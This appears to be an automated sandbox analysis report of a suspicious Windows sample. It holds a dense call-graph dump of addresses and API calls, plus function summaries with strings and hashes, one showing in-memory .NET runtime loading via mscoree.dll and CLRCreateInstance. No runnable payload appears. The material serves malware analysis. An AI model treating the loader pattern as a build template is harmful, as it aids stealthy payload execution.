6d02aef5 59057->59058 59060 6d0294b1 SafeArrayGetLBound 
SafeArrayGetUBound 59059->59060 59059->59146 59061 6d029658 59060->59061 59066 6d0294ef 59060->59066 59184 6d01d920 59061->59184 59063 6d0294fd SafeArrayGetElement 59063->59066 59063->59146 59064 6d02840e 59064->59146 59233 6d01dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59064->59233 59066->59061 59066->59063 59066->59064 59066->59146 59067 6d028441 59069 6d0284af SafeArrayGetLBound SafeArrayGetUBound 59067->59069 59067->59146 59068 6d02968f 59076 6d029794 SafeArrayGetLBound SafeArrayGetUBound 59068->59076 59068->59146 59070 6d028616 59069->59070 59071 6d0284ed SafeArrayGetElement 59069->59071 59234 6d01dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59070->59234 59081 6d028518 59071->59081 59071->59146 59073 6d02862b 59073->59146 59235 6d01dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59073->59235 59075 6d02864b 59075->59146 59236 6d01dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59075->59236 59087 6d029c5e 59076->59087 59101 6d0297d2 59076->59101 59078 6d02866b 59078->59146 59237 6d01dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59078->59237 59079 6d023a90 8 API calls 59079->59081 59080 6d0297e3 SafeArrayGetElement 59080->59101 59080->59146 59081->59070 59081->59071 59081->59079 59083 6d01d920 3 API calls 59090 6d029cf8 59083->59090 59084 6d02868a 59084->59146 59238 6d01dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59084->59238 59086 6d0286aa 59088 6d0269c0 11 API calls 59086->59088 59086->59146 59087->59083 59089 6d0286cf 59088->59089 59091 6d0269c0 11 API calls 59089->59091 59089->59146 59092 6d029d4f SafeArrayGetLBound SafeArrayGetUBound 59090->59092 59090->59146 59093 6d0286f5 59091->59093 59094 6d029ec7 59092->59094 59102 6d029d8d 59092->59102 59095 6d0269c0 11 API calls 59093->59095 59093->59146 59097 6d01d920 3 API calls 59094->59097 59095->59146 59096 6d029da0 SafeArrayGetElement 59096->59102 59096->59146 59098 6d029f09 59097->59098 59099 6d01d920 3 API 
calls 59098->59099 59098->59146 59103 6d029f8b 59099->59103 59100 6d023a90 8 API calls 59100->59102 59101->59064 59101->59080 59101->59087 59105 6d023a90 8 API calls 59101->59105 59102->59094 59102->59096 59102->59100 59104 6d01d920 3 API calls 59103->59104 59103->59146 59106 6d02a01f 59104->59106 59105->59101 59107 6d01d920 3 API calls 59106->59107 59106->59146 59108 6d02a09b 59107->59108 59109 6d02a1ac SafeArrayGetLBound SafeArrayGetUBound 59108->59109 59108->59146 59110 6d02a7b3 59109->59110 59124 6d02a1ea 59109->59124 59111 6d01d920 3 API calls 59110->59111 59113 6d02a7ce 59111->59113 59112 6d02a1fd SafeArrayGetElement 59115 6d02a815 59112->59115 59112->59124 59114 6d01d920 3 API calls 59113->59114 59113->59146 59114->59115 59115->59146 59192 6d0264d0 VariantInit VariantInit VariantInit SafeArrayCreateVector 59115->59192 59117 6d02a91d 59118 6d0264d0 109 API calls 59117->59118 59117->59146 59119 6d02a950 59118->59119 59120 6d0264d0 109 API calls 59119->59120 59119->59146 59121 6d02a983 59120->59121 59122 6d0264d0 109 API calls 59121->59122 59121->59146 59123 6d02a9b6 59122->59123 59125 6d0264d0 109 API calls 59123->59125 59123->59146 59124->59110 59124->59112 59128 6d023a90 8 API calls 59124->59128 59126 6d02a9e9 59125->59126 59127 6d0264d0 109 API calls 59126->59127 59126->59146 59129 6d02aa1c 59127->59129 59128->59124 59130 6d0264d0 109 API calls 59129->59130 59129->59146 59131 6d02aa4f 59130->59131 59132 6d0264d0 109 API calls 59131->59132 59131->59146 59133 6d02aa82 59132->59133 59134 6d0264d0 109 API calls 59133->59134 59133->59146 59135 6d02aab5 59134->59135 59136 6d0264d0 109 API calls 59135->59136 59135->59146 59137 6d02aae8 59136->59137 59138 6d0264d0 109 API calls 59137->59138 59137->59146 59139 6d02ab1e 59138->59139 59140 6d02abd0 59139->59140 59144 6d02ac5a 59139->59144 59139->59146 59206 6d022970 59140->59206 59239 6d02d790 77 API calls 3 library calls 59144->59239 59146->59043 59146->59044 59147 6d02ac37 59147->59146 59240 6d011690 77 API calls 
59147->59240 59149 6d02ad36 59241 6d0150c0 77 API calls 59149->59241 59151 6d02ad4d 59152 6d069bb5 77 API calls 59151->59152 59153 6d02ad5d 59152->59153 59154 6d015050 77 API calls 59153->59154 59155 6d02ad77 59154->59155 59242 6d0150c0 77 API calls 59155->59242 59157 6d02ad82 59158 6d069bb5 77 API calls 59157->59158 59159 6d02ad89 59158->59159 59160 6d015050 77 API calls 59159->59160 59161 6d02ada7 59160->59161 59162 6d069bb5 77 API calls 59161->59162 59163 6d02adae 59162->59163 59164 6d015050 77 API calls 59163->59164 59165 6d02adcc 59164->59165 59243 6d0150c0 77 API calls 59165->59243 59167 6d02add7 59168 6d069bb5 77 API calls 59167->59168 59169 6d02ade1 59168->59169 59170 6d015050 77 API calls 59169->59170 59171 6d02adfb 59170->59171 59244 6d0150c0 77 API calls 59171->59244 59173 6d02ae06 59245 6d0150c0 77 API calls 59173->59245 59175 6d02ae11 59246 6d012a40 327 API calls 59175->59246 59178 6d0269f3 59177->59178 59179 6d026a01 SafeArrayGetLBound SafeArrayGetUBound 59177->59179 59178->59179 59182 6d026a2a 59179->59182 59183 6d026a92 59179->59183 59180 6d026a30 SafeArrayGetElement 59180->59182 59180->59183 59182->59180 59182->59183 59247 6d023990 8 API calls 59182->59247 59183->59047 59185 6d01d944 SafeArrayCreateVector 59184->59185 59186 6d01d936 59184->59186 59187 6d01d95a 59185->59187 59189 6d01d981 59185->59189 59186->59185 59188 6d01d960 SafeArrayPutElement 59187->59188 59187->59189 59188->59187 59188->59189 59190 6d01d9d5 59189->59190 59191 6d01d9ce SafeArrayDestroy 59189->59191 59190->59068 59191->59190 59193 6d026554 59192->59193 59194 6d02655c SafeArrayPutElement VariantClear 59192->59194 59193->59194 59195 6d026584 SafeArrayPutElement VariantClear 59194->59195 59205 6d026655 59194->59205 59199 6d0265cd 59195->59199 59195->59205 59197 6d026665 SafeArrayDestroy 59198 6d02666c VariantClear VariantClear VariantClear 59197->59198 59198->59117 59199->59205 59248 6d01db30 VariantInit SafeArrayCreateVector SafeArrayPutElement 59199->59248 59201 6d02663a 
59201->59205 59252 6d0256b0 59201->59252 59205->59197 59205->59198 59216 6d0229c3 59206->59216 59207 6d022d21 59207->59146 59220 6d02d2e0 59207->59220 59208 6d0229ee SafeArrayGetLBound SafeArrayGetUBound 59210 6d022a20 SafeArrayGetElement 59208->59210 59214 6d022c53 59208->59214 59209 6d022d1a SafeArrayDestroy 59209->59207 59210->59214 59210->59216 59211 6d022ab6 VariantInit 59211->59216 59212 6d022b3a VariantInit 59212->59216 59213 6d022c8b VariantClear VariantClear 59213->59214 59214->59207 59214->59209 59215 6d022d3a VariantClear VariantClear VariantClear 59215->59214 59216->59207 59216->59208 59216->59210 59216->59211 59216->59212 59216->59213 59216->59214 59216->59215 59217 6d022cb6 VariantClear VariantClear VariantClear 59216->59217 59218 6d022bf9 VariantClear VariantClear VariantClear 59216->59218 59217->59214 59218->59216 59221 6d069bb5 77 API calls 59220->59221 59222 6d02d32f 59221->59222 59223 6d02d3db 59222->59223 59224 6d02d33e 59222->59224 59281 6d069533 66 API calls std::exception::_Copy_str 59223->59281 59270 6d02c530 VariantInit VariantInit SafeArrayCreateVector 59224->59270 59226 6d02d3ed 59282 6d06ac75 RaiseException 59226->59282 59229 6d02d404 59231 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59232 6d02d3d5 59231->59232 59232->59147 59233->59067 59234->59073 59235->59075 59236->59078 59237->59084 59238->59086 59239->59147 59240->59149 59241->59151 59242->59157 59243->59167 59244->59173 59245->59175 59246->59146 59247->59182 59251 6d01db8c 59248->59251 59249 6d01dbf0 SafeArrayDestroy 59250 6d01dbf7 VariantClear 59249->59250 59250->59201 59251->59249 59251->59250 59253 6d0256e0 59252->59253 59254 6d0256f4 59252->59254 59253->59254 59267 6d0257c0 81 API calls std::_Xinvalid_argument 59253->59267 59257 6d025744 59254->59257 59258 6d02570d VariantInit VariantCopy 59254->59258 59268 6d0257c0 81 API calls std::_Xinvalid_argument 59254->59268 59259 6d026880 VariantInit VariantInit 59257->59259 59258->59254 59258->59257 
59269 6d0691e1 59259->59269 59261 6d0268cd SafeArrayCreateVector SafeArrayPutElement VariantClear 59262 6d026913 SafeArrayPutElement 59261->59262 59266 6d02692d 59261->59266 59262->59266 59263 6d026980 SafeArrayDestroy 59264 6d026987 59263->59264 59265 6d026994 VariantClear VariantClear 59264->59265 59265->59205 59266->59263 59266->59264 59267->59254 59268->59254 59271 6d02c5a4 59270->59271 59272 6d02c5ac SafeArrayPutElement VariantClear 59270->59272 59271->59272 59273 6d02c7e4 59272->59273 59277 6d02c5cf 59272->59277 59274 6d02c7f0 SafeArrayDestroy 59273->59274 59275 6d02c7f7 VariantClear VariantClear 59273->59275 59274->59275 59276 6d02c817 59275->59276 59276->59231 59277->59273 59278 6d02c7d9 59277->59278 59286 6d06919e 67 API calls 3 library calls 59277->59286 59283 6d02df70 59278->59283 59281->59226 59282->59229 59287 6d02d410 59283->59287 59285 6d02df80 59285->59273 59286->59278 59288 6d02d472 VariantInit VariantInit VariantInit 59287->59288 59289 6d02d44e 59287->59289 59301 6d02d470 _memmove 59288->59301 59289->59285 59290 6d02d704 VariantClear VariantClear VariantClear 59292 6d02d75d 59290->59292 59290->59301 59291 6d069d66 _malloc 66 API calls 59291->59301 59292->59285 59293 6d02d579 SafeArrayCreateVector SafeArrayCreateVector SafeArrayAccessData 59293->59301 59294 6d02d5ec SafeArrayPutElement 59294->59301 59295 6d02d5d6 SafeArrayUnaccessData 59295->59294 59296 6d02d633 SafeArrayPutElement VariantClear 59296->59301 59298 6d02d6fa SafeArrayDestroy 59298->59301 59299 6d01db30 5 API calls 59299->59301 59300 6d0256b0 83 API calls 59300->59301 59301->59288 59301->59290 59301->59291 59301->59292 59301->59293 59301->59294 59301->59295 59301->59296 59301->59298 59301->59299 59301->59300 59302 6d026880 9 API calls 59301->59302 59303 6d069d2c 66 API calls 2 library calls 59301->59303 59302->59301 59303->59301 59304 6d06a510 59305 6d06a515 59304->59305 59307 6d06fe93 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 
59304->59307 59307->59305 59308 6d06a42d 59309 6d06a438 59308->59309 59314 6d06a4b8 ___BuildCatchObjectHelper 59308->59314 59313 6d06a468 59309->59313 59309->59314 59316 6d06a2ab 59309->59316 59311 6d06a498 59312 6d06a2ab __CRT_INIT@12 149 API calls 59311->59312 59311->59314 59312->59314 59313->59311 59313->59314 59315 6d06a2ab __CRT_INIT@12 149 API calls 59313->59315 59315->59311 59317 6d06a2b7 ___BuildCatchObjectHelper 59316->59317 59318 6d06a2bf 59317->59318 59319 6d06a339 59317->59319 59368 6d06e904 HeapCreate 59318->59368 59320 6d06a33f 59319->59320 59321 6d06a39a 59319->59321 59328 6d06a35d 59320->59328 59334 6d06a2c8 ___BuildCatchObjectHelper 59320->59334 59378 6d06d4e7 66 API calls _doexit 59320->59378 59324 6d06a39f 59321->59324 59325 6d06a3f8 59321->59325 59323 6d06a2c4 59327 6d06a2cf 59323->59327 59323->59334 59326 6d06e948 ___set_flsgetvalue 3 API calls 59324->59326 59325->59334 59386 6d06ec2f 79 API calls __freefls@4 59325->59386 59329 6d06a3a4 59326->59329 59369 6d06ec9d 86 API calls 5 library calls 59327->59369 59332 6d06a371 59328->59332 59379 6d06dd67 67 API calls __getptd_noexit 59328->59379 59383 6d06cb28 66 API calls __calloc_crt 59329->59383 59382 6d06a384 70 API calls __mtterm 59332->59382 59334->59313 59336 6d06a2d4 __RTC_Initialize 59340 6d06a2d8 59336->59340 59347 6d06a2e4 GetCommandLineA 59336->59347 59339 6d06a3b0 59339->59334 59342 6d06a3bc DecodePointer 59339->59342 59370 6d06e922 HeapDestroy 59340->59370 59341 6d06a367 59380 6d06e97c 70 API calls __getptd_noexit 59341->59380 59348 6d06a3d1 59342->59348 59345 6d06a2dd 59345->59334 59346 6d06a36c 59381 6d06e922 HeapDestroy 59346->59381 59371 6d06fc46 71 API calls 2 library calls 59347->59371 59351 6d06a3d5 59348->59351 59352 6d06a3ec 59348->59352 59384 6d06e9b9 66 API calls 4 library calls 59351->59384 59385 6d069d2c 66 API calls 2 library calls 59352->59385 59353 6d06a2f4 59372 6d06db22 73 API calls __calloc_crt 59353->59372 59357 6d06a3dc GetCurrentThreadId 59357->59334 59358 6d06a2fe 
59359 6d06a302 59358->59359 59374 6d06fb8b 95 API calls 3 library calls 59358->59374 59373 6d06e97c 70 API calls __getptd_noexit 59359->59373 59362 6d06a30e 59363 6d06a322 59362->59363 59375 6d06f915 94 API calls 6 library calls 59362->59375 59363->59345 59377 6d06dd67 67 API calls __getptd_noexit 59363->59377 59366 6d06a317 59366->59363 59376 6d06d2fa 77 API calls 4 library calls 59366->59376 59368->59323 59369->59336 59370->59345 59371->59353 59372->59358 59373->59340 59374->59362 59375->59366 59376->59363 59377->59359 59378->59328 59379->59341 59380->59346 59381->59332 59382->59334 59383->59339 59384->59357 59385->59345 59386->59334 58823 6d02e2ce 58824 6d069bb5 77 API calls 58823->58824 58825 6d02e2d5 58824->58825 58826 6d02e2ee 58825->58826 58880 6d031fd0 58825->58880 58828 6d069bb5 77 API calls 58826->58828 58839 6d02e343 58826->58839 58831 6d02e327 58828->58831 58829 6d02e360 58832 6d069bb5 77 API calls 58829->58832 58830 6d02e3a6 58833 6d069bb5 77 API calls 58830->58833 58879 6d02e564 moneypunct 58830->58879 58905 6d02eae0 58831->58905 58834 6d02e367 58832->58834 58837 6d02e400 58833->58837 58920 6d031910 78 API calls 2 library calls 58834->58920 58835 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58838 6d02e76e 58835->58838 58842 6d069bb5 77 API calls 58837->58842 58839->58829 58839->58830 58841 6d02e384 58921 6d031b20 11 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 58841->58921 58843 6d02e428 58842->58843 58846 6d015050 77 API calls 58843->58846 58845 6d02e399 58845->58830 58847 6d02e442 58846->58847 58848 6d069bb5 77 API calls 58847->58848 58849 6d02e449 58848->58849 58850 6d015050 77 API calls 58849->58850 58851 6d02e463 58850->58851 58852 6d069bb5 77 API calls 58851->58852 58853 6d02e46a 58852->58853 58854 6d015050 77 API calls 58853->58854 58855 6d02e484 58854->58855 58856 6d069bb5 77 API calls 58855->58856 58857 6d02e48b 58856->58857 58858 6d015050 77 API calls 58857->58858 58859 6d02e4a5 58858->58859 
58860 6d069bb5 77 API calls 58859->58860 58861 6d02e4ac 58860->58861 58862 6d015050 77 API calls 58861->58862 58863 6d02e4c6 58862->58863 58864 6d02e4d3 58863->58864 58922 6d06919e 67 API calls 3 library calls 58863->58922 58866 6d069bb5 77 API calls 58864->58866 58867 6d02e4e3 58866->58867 58868 6d015050 77 API calls 58867->58868 58869 6d02e4fd 58868->58869 58870 6d069bb5 77 API calls 58869->58870 58871 6d02e504 58870->58871 58872 6d015050 77 API calls 58871->58872 58873 6d02e51e 58872->58873 58874 6d069bb5 77 API calls 58873->58874 58875 6d02e525 58874->58875 58876 6d015050 77 API calls 58875->58876 58877 6d02e53f 58876->58877 58878 6d0116b0 327 API calls 58877->58878 58878->58879 58879->58835 58881 6d069bb5 77 API calls 58880->58881 58882 6d032013 58881->58882 58883 6d0321f3 58882->58883 58884 6d032020 58882->58884 58957 6d069533 66 API calls std::exception::_Copy_str 58883->58957 58923 6d036480 58884->58923 58887 6d03220b 58958 6d06ac75 RaiseException 58887->58958 58889 6d032226 58890 6d03206c 58939 6d0035f0 58890->58939 58892 6d03216e 58950 6d032300 58892->58950 58894 6d032194 58895 6d032300 77 API calls 58894->58895 58896 6d0321a0 58895->58896 58897 6d032300 77 API calls 58896->58897 58898 6d0321ad 58897->58898 58899 6d032300 77 API calls 58898->58899 58900 6d0321ba 58899->58900 58901 6d032300 77 API calls 58900->58901 58902 6d0321c6 58901->58902 58903 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58902->58903 58904 6d0321ef 58903->58904 58904->58826 58906 6d069bb5 77 API calls 58905->58906 58907 6d02eb17 58906->58907 58908 6d02eb22 58907->58908 58909 6d02f4c9 58907->58909 59003 6d06a25a GetSystemTimeAsFileTime 58908->59003 59011 6d069533 66 API calls std::exception::_Copy_str 58909->59011 58911 6d02f4dc 59012 6d06ac75 RaiseException 58911->59012 58914 6d02eb5b 59005 6d069dfa 58914->59005 58915 6d02f4f1 58920->58841 58921->58845 58922->58864 58924 6d03655d 58923->58924 58928 6d0364c8 58923->58928 58925 6d06948b 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58924->58925 58926 6d03657d 58925->58926 58926->58890 58927 6d03651d 58927->58924 58962 6d002f40 77 API calls 58927->58962 58928->58924 58928->58927 58959 6d002f40 77 API calls 58928->58959 58931 6d0364f5 58960 6d036400 77 API calls std::tr1::_Xweak 58931->58960 58932 6d036535 58963 6d036400 77 API calls std::tr1::_Xweak 58932->58963 58935 6d03650e 58961 6d06ac75 RaiseException 58935->58961 58936 6d03654e 58964 6d06ac75 RaiseException 58936->58964 58965 6d056d40 58939->58965 58942 6d036480 77 API calls 58943 6d00364c 58942->58943 58972 6d004b30 58943->58972 58945 6d0036a7 58976 6d0386e0 58945->58976 58947 6d0036bc 58948 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58947->58948 58949 6d003701 58948->58949 58949->58892 58951 6d03231d 58950->58951 58952 6d0323aa 58951->58952 58953 6d069bb5 77 API calls 58951->58953 58952->58894 58955 6d032331 58953->58955 58954 6d032374 moneypunct 58954->58894 58955->58954 59002 6d032480 77 API calls 58955->59002 58957->58887 58958->58889 58959->58931 58960->58935 58961->58927 58962->58932 58963->58936 58964->58924 58966 6d036480 77 API calls 58965->58966 58967 6d056d7f 58966->58967 58984 6d038d80 58967->58984 58970 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58971 6d003630 58970->58971 58971->58942 58973 6d004b65 58972->58973 58994 6d004fa0 58973->58994 58975 6d004b7f 58975->58945 58977 6d038728 58976->58977 58978 6d038765 58977->58978 59000 6d037cd0 77 API calls 3 library calls 58977->59000 58979 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58978->58979 58980 6d03878a 58979->58980 58980->58947 58982 6d038756 59001 6d06ac75 RaiseException 58982->59001 58985 6d069d66 _malloc 66 API calls 58984->58985 58989 6d038d8f 58985->58989 58986 6d038dbb 58986->58970 58987 6d0691f6 70 API calls 58987->58989 58988 6d038dc1 std::exception::exception 58993 6d06ac75 RaiseException 
58988->58993 58989->58986 58989->58987 58989->58988 58992 6d069d66 _malloc 66 API calls 58989->58992 58991 6d038df0 58992->58989 58993->58991 58995 6d069bb5 77 API calls 58994->58995 58997 6d004fcf 58995->58997 58996 6d004ff1 58996->58975 58997->58996 58999 6d005050 81 API calls _memcpy_s 58997->58999 58999->58996 59000->58982 59001->58978 59002->58952 59004 6d06a28a __aulldiv 59003->59004 59004->58914 59013 6d06eae6 59005->59013 59008 6d069e0c 59009 6d06eae6 __getptd 66 API calls 59008->59009 59010 6d02eb69 59009->59010 59010->58839 59011->58911 59012->58915 59018 6d06ea6d GetLastError 59013->59018 59015 6d06eaee 59017 6d02eb61 59015->59017 59033 6d06d4f6 66 API calls 3 library calls 59015->59033 59017->59008 59034 6d06e948 TlsGetValue 59018->59034 59021 6d06ea8c 59037 6d06cb28 66 API calls __calloc_crt 59021->59037 59022 6d06eada SetLastError 59022->59015 59024 6d06ea98 59024->59022 59025 6d06eaa0 DecodePointer 59024->59025 59026 6d06eab5 59025->59026 59027 6d06ead1 59026->59027 59028 6d06eab9 59026->59028 59039 6d069d2c 66 API calls 2 library calls 59027->59039 59038 6d06e9b9 66 API calls 4 library calls 59028->59038 59031 6d06eac1 GetCurrentThreadId 59031->59022 59032 6d06ead7 59032->59022 59035 6d06e95d DecodePointer TlsSetValue 59034->59035 59036 6d06e978 59034->59036 59035->59036 59036->59021 59036->59022 59037->59024 59038->59031 59039->59032 59387 6d0316af 59388 6d0316b4 59387->59388 59389 6d03170f 59388->59389 59390 6d069bb5 77 API calls 59388->59390 59391 6d031769 59389->59391 59394 6d069bb5 77 API calls 59389->59394 59392 6d0316cd 59390->59392 59393 6d0317c3 59391->59393 59397 6d069bb5 77 API calls 59391->59397 59395 6d0316e9 59392->59395 59437 6d02ea40 59392->59437 59396 6d03181d 59393->59396 59400 6d069bb5 77 API calls 59393->59400 59398 6d031727 59394->59398 59442 6d018400 59395->59442 59403 6d031877 59396->59403 59404 6d069bb5 77 API calls 59396->59404 59401 6d031781 59397->59401 59402 6d031743 59398->59402 59407 6d02ea40 78 API calls 59398->59407 
59409 6d0317db 59400->59409 59411 6d02ea40 78 API calls 59401->59411 59413 6d03179d 59401->59413 59408 6d018400 77 API calls 59402->59408 59406 6d0318d1 59403->59406 59412 6d069bb5 77 API calls 59403->59412 59415 6d031835 59404->59415 59407->59402 59416 6d03175f 59408->59416 59417 6d02ea40 78 API calls 59409->59417 59419 6d0317f7 59409->59419 59411->59413 59420 6d03188f 59412->59420 59421 6d018400 77 API calls 59413->59421 59414 6d031851 59428 6d018400 77 API calls 59414->59428 59415->59414 59423 6d02ea40 78 API calls 59415->59423 59451 6d0180b0 67 API calls moneypunct 59416->59451 59417->59419 59425 6d018400 77 API calls 59419->59425 59426 6d0318ab 59420->59426 59430 6d02ea40 78 API calls 59420->59430 59422 6d0317b9 59421->59422 59452 6d0180b0 67 API calls moneypunct 59422->59452 59423->59414 59429 6d031813 59425->59429 59431 6d018400 77 API calls 59426->59431 59432 6d03186d 59428->59432 59453 6d0180b0 67 API calls moneypunct 59429->59453 59430->59426 59434 6d0318c7 59431->59434 59454 6d0180b0 67 API calls moneypunct 59432->59454 59455 6d0180b0 67 API calls moneypunct 59434->59455 59438 6d069bb5 77 API calls 59437->59438 59439 6d02ea6b 59438->59439 59440 6d02ea7e SysAllocString 59439->59440 59441 6d02ea99 59439->59441 59440->59441 59441->59395 59443 6d069bb5 77 API calls 59442->59443 59444 6d01840d 59443->59444 59445 6d018416 59444->59445 59456 6d069533 66 API calls std::exception::_Copy_str 59444->59456 59450 6d0180b0 67 API calls moneypunct 59445->59450 59447 6d01844e 59457 6d06ac75 RaiseException 59447->59457 59449 6d018463 59450->59389 59451->59391 59452->59393 59453->59396 59454->59403 59455->59406 59456->59447 59457->59449

Control-flow Graph

[Control-flow graph, starting at block 6d02b6b0-6d02b758; legend: Executed / Not Executed]
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02B73F
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D02B748
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D02B7BE
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D02B7F5
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02B801
                                                                                            • Part of subcall function 6D02C850: VariantInit.OLEAUT32(?), ref: 6D02C88F
                                                                                            • Part of subcall function 6D02C850: VariantInit.OLEAUT32(?), ref: 6D02C895
                                                                                            • Part of subcall function 6D02C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D02C8A0
                                                                                            • Part of subcall function 6D02C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D02C8D5
                                                                                            • Part of subcall function 6D02C850: VariantClear.OLEAUT32(?), ref: 6D02C8E1
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02BA15
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02BE90
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02BEA3
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D02BEA9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
                                                                                          • String ID:
                                                                                          • API String ID: 2012514194-0
                                                                                          • Opcode ID: 1155bf0f81c24c7213ba681b333cfe15e2686a7953a1c7854f26c88b587db655
                                                                                          • Instruction ID: ead2cb8ae8bbbc9c4f9e44c934e4cd614c56064ba0bfc3c8e1422cb6fda7dd80
                                                                                          • Opcode Fuzzy Hash: 1155bf0f81c24c7213ba681b333cfe15e2686a7953a1c7854f26c88b587db655
                                                                                          • Instruction Fuzzy Hash: C8525A71901219DFDF10CFA8C880BEEBBF6BF89310F158199E909AB355DB70A945CB91

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1768998212.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5cc0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HERE$HERE$HERE$HERE$HERE$HERE$HERE$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$LOOK$p<^q$p<^q$p<^q$p<^q$Gvq$Gvq$Gvq$Gvq$Gvq
                                                                                          • API String ID: 0-3728642687
                                                                                          • Opcode ID: 357c35e6a6916a9041fd8635ef2f6353adf63f95f9d4c85fb1fce37b650a8554
                                                                                          • Instruction ID: 96b4654169d5a67d8ee9b58b0f1fab47b8862b73dffcdf1f058c7db8b9d89207
                                                                                          • Opcode Fuzzy Hash: 357c35e6a6916a9041fd8635ef2f6353adf63f95f9d4c85fb1fce37b650a8554
                                                                                          • Instruction Fuzzy Hash: D582B274E002298FDB64DF69C988BD9BBB2BB48300F1485E9D50DAB365DB349E85CF50

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(mscoree.dll,4E8A916F), ref: 6D01B711
                                                                                          • LoadLibraryW.KERNEL32(mscoree.dll), ref: 6D01B71C
                                                                                          • GetProcAddress.KERNEL32(00000000,CLRCreateInstance), ref: 6D01B730
                                                                                          • __cftoe.LIBCMT ref: 6D01B870
                                                                                          • GetModuleHandleW.KERNEL32(?), ref: 6D01B88B
                                                                                          • GetProcAddress.KERNEL32(00000000,C8F5E518), ref: 6D01B8D7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc$LibraryLoad__cftoe
                                                                                          • String ID: CLRCreateInstance$mscoree.dll$v4.0.30319
                                                                                          • API String ID: 1275574042-506955582
                                                                                          • Opcode ID: 9488a5ff3b6e2af2e473f096ce6e2f7176c01f1ba9ce28c28c4afa37e84ce58c
                                                                                          • Instruction ID: 6ddae09114873d7f1548cc1b3c5e350bcee61684b12197ba57ebc696760f57fa
                                                                                          • Opcode Fuzzy Hash: 9488a5ff3b6e2af2e473f096ce6e2f7176c01f1ba9ce28c28c4afa37e84ce58c
                                                                                          • Instruction Fuzzy Hash: B8912971D082899FEB04DFE8CC80AAEBBB5FF49310B10856DE119AB351D770A946CB55
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (o^q$(o^q$,bq$,bq$Hbq
                                                                                          • API String ID: 0-3486158592
                                                                                          • Opcode ID: 0afb6738475e8624cf72c716dda2bd820fbaf1e30a0768fa5f52c3c6ac988869
                                                                                          • Instruction ID: 741f2f328720e3c74b7ebe4ef42d3160e8f04b9909f71085412294ce44099779
                                                                                          • Opcode Fuzzy Hash: 0afb6738475e8624cf72c716dda2bd820fbaf1e30a0768fa5f52c3c6ac988869
                                                                                          • Instruction Fuzzy Hash: 7F628F34A405158FCB19DF69C884AEEBBB2BF88718F15E569E805DB364DB31EC41CB90
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8cq
                                                                                          • API String ID: 0-304758316
                                                                                          • Opcode ID: 62787e0f3ee8cb75f998f831766c7d09c3d9b8d37c63c7c2c83f074c9bec20fd
                                                                                          • Instruction ID: b34f6339de73b068dbad50474dac60a316799174cb9f7ea6869024f323737413
